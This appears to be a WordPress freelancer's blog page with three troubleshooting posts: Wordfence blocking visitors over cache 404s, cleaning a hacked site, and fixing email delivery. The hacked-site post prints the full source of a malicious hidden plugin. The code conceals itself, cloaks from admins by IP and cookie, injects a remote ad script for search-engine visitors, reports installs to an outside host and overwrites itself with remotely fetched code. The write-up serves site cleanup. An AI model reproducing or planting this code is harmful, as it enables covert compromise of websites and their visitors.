sell website making service

Tag: plugin tutorial

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Wordfence was blocking all visitors and my email was full of blocking emails. It was supposed to block when a visitor or hacker only tries to find non-existent PHP or script pages to exploit vulnerable codes and pages and inject malware/virus.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It
inbox was full of IP-blocking messages

But due to a cache problem a lot of CSS files were missing, it was a plugin error of the cache plugin. So when any visitor was visiting the site a large number of CSS scrips was not found automatically therefore wordfence blocked the visitors.

Let’s share screenshots from my PC to walk you through the process of how I found the issue and solved it:

Step:2

I checked the Wordfence dashboard and found CSS files missing problem led to all IP blocking.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 3:

I visited the website Dakhm.com and found many missing 404 CSS files due to cache problems.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 4:

Then I tried to visit another page of the website, but now Wordfence blocked my IP too like other IPs.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 5:

In this step, I need to unblock myself and login to the website to remove my IP from Wordfence block list. I will be using Filezilla for FTP to change Wordfence plugin’s folder name so that Wordfence plugin is deactivated. In this way, my ip will be unblocked as the plugin itself is deactivated.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 6:

I could log in after deactivating the Wordfence plugin.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 6:

Follow the screenshot below to clear the cache from the wp optimize cache plugin.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 7:

Then go to Cloudways as per the below screenshot, and clear Varnish cache from your server.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It
Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Step 8:

Then go to Cloudflare as per the below screenshot, and clear Everything.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

After clearing all cache I saw there was no missing css files, from chrome inspect element.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Then change Wordfence plugin’s folder to real name with FTP and login to website and activate the plugin, then go to the blocking option and unblock necessary ips, like below screenshot. And you are done.

Wordfence Blocked All IPs Due to Cache Problem for Not Found Scripts, How I Solved It

Share this article if it helps.

If you need help regarding any WordPress/website issues, you can contact me.

Hacked code injected of ad site – re directs when clicked from google search

Hacked code injected of ad site - re directs when clicked from google search

When clicking on a website’s link from Google and visitor lands on the page, and if the visitor clicks on any link on that particular web page it auto redirects to URLs containing “shigaxapo”. But if the visitor is not from the search engine it doesn’t re-direct and behaves normally. Only visitors from search engines is redirected and other users are safe from this hacked process. In this article, I will discuss how I solved this malware.

Message I got from the client

From a client, I got a message “can you fix this problem? My website is redirecting visitors to another website, do you know why this is happening?” I hoped in quickly and replied to him “I need to analyze first because every website is different and not one solution fits all and hacking is a complicated procedure to fix”. The client agreed and allowed us to investigate the issue.

Formula to solve a problem

Note: from my past experience I have seen solving a problem or making a change or customization is requires 2 major step: 1) Analyzing the problem and finding a way to fix, it takes 80-90% of the time and 2) rest 10-15% is just actually making the change in codes or files physically.

Scenario:

I saw when I click results from Google and land on the site, and click link on the site it is re directing me to URLs containing “shigaxapo” but when I am on the site it is not re directing anymore, or if I visit the site directly as a visitor it is not re directing and as an admin when logged in it was also not redirecting.

My thoughts:

As it is redirecting to urls containing “shigaxapo”, I “inspect element” with Google Chrome and found nothing, and re direction cannot be done on WordPress by CSS or HTML it must be using javascript or php.

My steps:

So I downloaded the whole site files with Filezilla FTP and searched for the word “shigaxapo” with Notepad++ luckily I found a malware file that is not part of or any other authentic plugin by WordPress. The file was mplugin.php there I analyzed the PHP file and found codes and functions, algorithms to inject the site with such malware. From that php file, I got another file admin_ips.txt where admin ips are stored like this:

2.36.67.193
81.31.155.59
119.30.47.136

My Verdict:

Inside plugins folder it is injected/hacked, this is a plugin that hides itself and activates automatically. You can check from activated plugins that 1 extra plugin is activated but not visible from the wp-admin plugins list.

I deleted those files and ran multiple tests from different devices and re-directing problem was solved successfully. And the client was happy :D.

I will be attaching some codes or the file to make it clear. Leave a comment below if you have any questions or ask me anything.

Share this article if it helps.

If you need help regarding any WordPress/website issues, you can contact me.

Below is the code from file mplugin.php

<?php
/**
 * Plugin Name: Monetization Code plugin
 * Description: mplugin Shows cusom codes to display your ad codes.
 * Author: aerin Singh
 * Version: 1.0
 */
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='276be77f6692f898404fb9629f81db09';
$version='1.2';

add_action('admin_menu', function() {
    add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' );
    remove_submenu_page( 'options-general.php', 'mplugin' );
});



add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin');
function salcode_add_plugin_page_settings_mplugin( $links ) {
	$links[] = '<a href="' .
		admin_url( 'options-general.php?page=mplugin' ) .
		'">' . __('Settings') . '</a>';
	return $links;
}






add_action( 'admin_init', function() {

    register_setting( 'mplugin-settings', 'default_mont_options' );
    register_setting( 'mplugin-settings', 'ad_code' );
	register_setting( 'mplugin-settings', 'hide_admin' );
	register_setting( 'mplugin-settings', 'hide_logged_in' );
    register_setting( 'mplugin-settings', 'display_ad' );
    register_setting( 'mplugin-settings', 'search_engines' );
	register_setting( 'mplugin-settings', 'auto_update' );
	register_setting( 'mplugin-settings', 'ip_admin');
	register_setting( 'mplugin-settings', 'cookies_admin' );
	register_setting( 'mplugin-settings', 'logged_admin' );
	register_setting( 'mplugin-settings', 'log_install' );
	
});

$ad_code='
<script>
(function(__htas){
var d = document,
    s = d.createElement(\'script\'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/shigaxapo.com\/c\/D.9D6\/bA2D5hlJSnWaQf9AN\/DsEP0\/MCTdgo2cN-i\/0\/0oM\/T\/Q\/xoOsDJYX3v";
l.parentNode.insertBefore(s, l);
})({})
</script>

';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

function mplugin_page() {
 ?>
   <div class="wrap">
<form action="options.php" method="post">
       <?php
       settings_fields( 'mplugin-settings' );
       do_settings_sections( 'mplugin-settings' );
$ad_code='';

$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';

       ?>
	   <h2>mplugin Plugin</h2>
	   <table>
             
 <tr>
                <th>Ad Code</th>
                <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
            </tr>
			
			
			
<tr>
                <th>Hide ads to :</th>
                <td>
                    <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
                    <label>
                        <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
                    </label>
                    <label>
                        <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
                    </label>
					<br/>
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Recognize admin by :</th>
                <td>

                    <label>
                        <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
                    </label>
                    <label>
                        <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
                    </label>
                                        <label>
                        <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
                    </label>
				
                 

                </td>
            </tr>
			
			
			
			<tr>
                <th>Display ads to :</th>
                <td>
                 				         <select name="display_ad">
                        
                        <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
                        <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
                        
                    </select>

                </td>
            </tr>

            <tr>
                <th>Search Engines</th>
                <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
			comma separated  </p>
				</td>
            </tr>
 
 
 <tr>
                <th>Auto Update :</th>
                <td>

                    <label>
                        <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
                    </label><br/>
                 

                </td>
            </tr>
 
            <tr>
                <td><?php submit_button(); ?></td>
            </tr>
 
        </table>
	   
	   
	   
     </form>
   </div>
 <?php
}

/*************************log install***************************/
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_mplugin("http://www.bomndo.xyz/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/

if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}

/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php'); 

if ( ! function_exists( 'display_ad_single' ) ) {  

function display_ad_single($content){ 
if(is_single())
{

$content=$content.get_option('ad_code');;
}
return $content;
} 

function display_ad_footer(){ 
if(!is_single())
{
echo get_option('ad_code');
}
} 


//setting cookies if admin logged in
function setting_admin_cookie() {
  setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(get_option('cookies_admin')=='on')
{

if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}


//log admin IP addresses
$vis_ip=getVisIpAddr_mplugin();
if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{

if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}

if (stripos($ip, $vis_ip) === false)
{
$ip.=$vis_ip.'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

}

}
}// end if log admins ip




//add cookies to organic traffic

if(get_option('display_ad')=='organic')
{

$search_engines = explode(',', get_option('search_engines'));

$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
  if (strpos($referer,$search)!==false) {
    setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$organic=true;
  }
}

}//end




//display ad

if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) 
{

$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $vis_ip) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer'); 
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');  
}

/****/

}

}
/*******************/





//update plugin

if(get_option('auto_update')=='on')
{

if( ini_get('allow_url_fopen') ) {



        if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }

}
else
{
            if (($new_version = @file_get_contents("http://www.bomndo.xyz/update.php") OR $new_version = @file_get_contents_mplugin("http://www.bomndo.xyz/update.php")) AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
        
        
                elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.com/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }


        elseif ($new_version = @file_get_contents_mplugin("http://www.bomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {

            if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
               @file_put_contents(__FILE__, $new_version);
                
            }
        }
}
}//end if auto update

/*********************************/



}// if function exist



     function file_get_contents_mplugin($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }


function hide_plugin_mplugin() {
  global $wp_list_table;
  $hidearr = array('mplugin.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$key]);
    }
  }
}

add_action('pre_current_active_plugins', 'hide_plugin_mplugin');

        function getVisIpAddr_mplugin() { 
      
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { 
        return $_SERVER['HTTP_CLIENT_IP']; 
    } 
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
        return $_SERVER['HTTP_X_FORWARDED_FOR']; 
    } 
    else { 
        return $_SERVER['REMOTE_ADDR']; 
    } 
}

?>

Why WordPress website is not sending any emails?

One of the WordPress websites I maintain had a problem. This problem is very very common amongst my clients also. The problem is website is not sending emails to Gmail or any other assigned email address. And I had the solution.

Why WordPress website is not sending any emails?

Why WordPress website is not sending any emails?

If your WordPress website is not sending emails, the issue could be due to hosting limitations, incorrect configurations, spam filters, plugin conflicts, theme issues, blocked email ports, email queuing problems, or misconfigured contact forms. By systematically checking each of these areas and using the solutions provided, you should be able to identify and resolve the issue.

Why do websites need to send emails?

Why WordPress website is not sending any emails?

Any WordPress website or any other platform website needs to send emails for the following reasons:

  1. User Verification: Confirm email addresses and activate new accounts.
  2. Password Recovery: Allow users to reset forgotten passwords.
  3. Transactional Updates: Send order confirmations and shipping notifications.
  4. User Engagement: Distribute newsletters, promotional offers, and event reminders.
  5. Security Alerts: Notify users of suspicious activity and provide two-factor authentication codes.
  6. Feedback Requests: Collect user feedback and survey responses.
  7. Community Notifications: Inform users about social interactions, such as messages and comments.
  8. Legal Compliance: Communicate updates to terms of service and privacy policies.

Emails enhance user experience, improve security, ensure compliance, and drive engagement.

When a website needs to communicate with a user it sends an email.

Why you should use a ready-made WordPress plugin?

There are many possibilities as to why your WordPress website is not sending emails and I had to manually check all the steps. This is a very long process and not effective unless you are an expert developer. So ready-made plugin is the best solution.

Which WordPress plugin is best to help send email from a WordPress website?

Why WordPress website is not sending any emails?

I use the “WP Mail SMTP Lite” WordPress plugin, it solves all the problems literally and processes your website’s emails smoothly.

How to configure the WP Mail SMTP plugin?

Why WordPress website is not sending any emails?

It was pretty hard at the beginning to configure, there was no helpful guide, and guide and Google Cloud console kept changing. I initially searched YouTube for tutorials and configured plugins on my own. Later WP Mail SMTP published an official guide on how to configure the WP Mail SMTP plugin you can check the link here https://wpmailsmtp.com/docs/how-to-set-up-the-gmail-mailer-in-wp-mail-smtp/

Why WordPress website is not sending any emails?

I successfully configured the plugin and it’s working fine, sending all the emails from my server to my gmail.

If you need help regarding any WordPress/website issues, you can contact me.

Check Most Recent Posts